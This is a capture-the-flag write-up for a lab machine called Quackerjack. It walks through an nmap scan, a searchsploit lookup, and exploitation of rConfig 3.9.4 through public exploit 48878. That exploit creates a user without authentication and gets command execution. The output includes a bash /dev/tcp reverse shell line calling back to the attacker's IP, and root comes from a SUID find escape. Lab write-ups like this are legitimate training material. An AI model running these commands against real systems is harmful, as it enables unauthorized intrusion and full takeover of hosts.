Quackerjack
Intro
This machine was running a version of the rConfig service which was vulnerable to unathenticated user creation, followed by authenticated remote command execution. After achieving initial access, privilege escalation was achieved by leveraging the /usr/bin/find SUID binary.
Initial Foothold
We begin by running an nmap scan on the target.
# Nmap 7.94SVN scan initiated Fri Nov 1 09:28:42 2024 as: nmap -p- -sV -sC -oA nmap/fulltcp -vv quackerjack.pg
Nmap scan report for quackerjack.pg (192.168.163.57)
Host is up, received echo-reply ttl 61 (0.050s latency).
Scanned at 2024-11-01 09:28:42 CDT for 180s
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.2
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.45.234
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:ec:75:8d:86:9b:a3:0b:d3:b6:2f:64:04:f9:fd:25 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCWsUPf+lVe3JddBDNBbM3vSxW2Nbl7ZniBHSy2r7B9KN42uteBJeZtPoxcBGPEcUv4ZZQ7CrIyKEqNjpz4QfryIb9Ta4ehTJNumQCXV2r2VsLDYCK0C+FjOwc++o/iqUOPm48NNO3s//vhb33VZ1g5dnEnXQ68jdJ3G382+cVfcWj6WSZLS1hk7HLq2lYrTZD6krJ1eEZxgIb6YiXnSruEtntEpiEy5c92yh3KFnvVhgwNJe/WyNpXLrE4I66lX5EWhTAhw/6373RL/3efGsptmwhb7wrMXdscic/JOmUMUKYPRVl7KGMik0kjVH/rXpEpTjUONQ+3DhuT7khuB5MF
| 256 b6:d2:fd:bb:08:9a:35:02:7b:33:e3:72:5d:dc:64:82 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMT94WFh/L5UMkSoHb0Obh3JTETeKzHNMKfnuJleky0X/AEbM+TV5WCsd7GcWfhfsFxK1xyK9iyNzmKmShy3Fk8=
| 256 08:95:d6:60:52:17:3d:03:e4:7d:90:fd:b2:ed:44:86 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIANg5sdcd3U3DkheWc10jhSTJbOSE7Lqtyu+yQhLuywl
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
|_http-title: Apache HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
111/tcp open rpcbind syn-ack ttl 61 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp open mysql syn-ack ttl 61 MariaDB (unauthorized)
8081/tcp open http syn-ack ttl 61 Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: 400 Bad Request
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
Service Info: Host: QUACKERJACK; OS: Unix
Host script results:
|_clock-skew: mean: 1h20m02s, deviation: 2h18m37s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 51879/tcp): CLEAN (Timeout)
| Check 2 (port 2680/tcp): CLEAN (Timeout)
| Check 3 (port 34238/udp): CLEAN (Timeout)
| Check 4 (port 30292/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.10.4)
| Computer name: quackerjack
| NetBIOS computer name: QUACKERJACK\x00
| Domain name: \x00
| FQDN: quackerjack
|_ System time: 2024-11-01T10:31:07-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-11-01T14:31:03
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 1 09:31:42 2024 -- 1 IP address (1 host up) scanned in 180.53 seconds
We manually examined the HTTP services and noted that the application rConfig 3.9.4 was running on port 8081.
Searchsploit yielded several RCE exploits for this service.
┌──(joe㉿kali)-[~]
└─$ searchsploit rConfig
------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------- ---------------------------------
Campsite 2.6.1 - 'LocalizerConfig.php?g_documentRoot' | php/webapps/30005.txt
HMS HICP Protocol + Intellicom - 'NetBiterConfig.exe' | hardware/remote/10451.txt
Intellicom 1.3 - 'NetBiterConfig.exe Hostname' Data Re | windows/dos/33403.py
rConfig - install Command Execution (Metasploit) | linux/remote/47602.rb
rConfig 3.1.1 - Local File Inclusion | php/webapps/39898.txt
rConfig 3.9 - 'searchColumn' SQL Injection | php/webapps/48208.py
rConfig 3.9.2 - Remote Code Execution | php/webapps/47555.py
rConfig 3.9.3 - Authenticated Remote Code Execution | php/webapps/47982.py
rConfig 3.9.4 - 'search.crud.php' Remote Command Injec | php/webapps/48241.py
rConfig 3.9.4 - 'searchField' Unauthenticated Root Rem | php/webapps/48261.py
rConfig 3.9.5 - Remote Code Execution (Unauthenticated | php/webapps/48878.py
rConfig 3.9.6 - 'path' Local File Inclusion (Authentic | php/webapps/49644.txt
rconfig 3.9.6 - Arbitrary File Upload | php/webapps/49783.py
rConfig 3.9.6 - Arbitrary File Upload to Remote Code E | php/webapps/49665.txt
rconfig 3.9.7 - Sql Injection (Authenticated) | php/webapps/51163.py
rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Rem | php/webapps/48207.py
Rconfig 3.x - Chained Remote Code Execution (Metasploi | linux/remote/48223.rb
------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No ResultsRunning exploit 48878, we were able to catch a reverse shell on port 80, running as the apache user.
┌──(joe㉿kali)-[~/hax/pg/quackerjack]
└─$ python3 48878.py
Connecting to: https://quackerjack.pg:8081/
Connect back is set to: /bin/bash -i >& /dev/tcp/192.168.45.234/80 0>&1, please launch 'nc -lv 9001'
Version is rConfig Version 3.9.4 it may not be vulnerable
Remote Code Execution + Auth bypass rConfig 3.9.5 by Daniel Monzón
In the last stage if your payload is a reverse shell, the exploit may not launch the success message, but check your netcat ;)
Note: preferred method for auth bypass is 1, because it is less 'invasive'
Note2: preferred method for RCE is 2, as it does not need you to know if, for example, netcat has been installed in the target machine
Choose method for authentication bypass:
1) User creation
2) User enumeration + User edit
Method>1
(+) User test created
Choose method for RCE:
1) Unsafe call to exec()
2) Template edit
Method>1
(+) Log in as test completed
(-) Error when executing payload, please debug the exploit
(+) Log in as test completed
(+) Payload executed successfully┌──(joe㉿kali)-[~/hax/pg/quackerjack]
└─$ sudo nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.163.57] 60414
bash: no job control in this shell
bash-4.2$ whoami
whoami
apache
bash-4.2$ Privilege Escalation
Running linpeas, we discovered that the /usr/bin/find binary is SUID. GTFOBins showed that this binary does not drop privileges, and has the ability to run additional commands. Using this, we were able to execute /bin/sh as the root user.
bash-4.2$ ls -la /usr/bin/find
ls -la /usr/bin/find
-rwsr-xr-x. 1 root root 199304 Oct 30 2018 /usr/bin/find
bash-4.2$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
sh-4.2# whoami
whoami
rootLast updated
